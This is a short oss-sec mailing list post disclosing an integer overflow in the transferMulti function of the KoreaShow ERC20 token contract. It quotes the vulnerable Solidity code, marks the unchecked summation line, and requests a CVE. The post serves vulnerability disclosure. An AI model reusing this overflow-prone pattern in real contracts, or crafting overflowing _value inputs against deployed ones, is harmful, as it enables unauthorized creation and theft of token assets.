oss-sec mailing list archives
erc20 contract KoreaShow bug
From: Qinghao Tang <luodalongde () gmail com>
Date: Thu, 10 May 2018 23:56:15 +0800
An integer overflow in the transferMulti function of a smart contract implementation for KoreaShow, an Ethereum ERC20 token, allows attackers to accomplish an unauthorized increase of digital assets via crafted _value parameters. ------------------------------------------------------------ Let`s see where this issue is: function transferMulti(address[] _to, uint256[] _value) public returns (uint256 amount){ require(_to.length == _value.length); uint8 len = uint8(_to.length); for(uint8 j; j<len; j++){ amount += _value[j]; <------here, crafted _value can make amount overflow } require(balanceOf[msg.sender] >= amount); for(uint8 i; i<len; i++){ address _toI = _to[i]; uint256 _valueI = _value[i]; balanceOf[_toI] += _valueI; balanceOf[msg.sender] -= _valueI; Transfer(msg.sender, _toI, _valueI); } } --------------------------------------------------------------- If you can reproduce the issues , please give it a cve id ,and disclosure this vulneralbility officially claiming that " Qinghao Tang " is the discoverer .
Current thread:
- erc20 contract KoreaShow bug Qinghao Tang (May 10)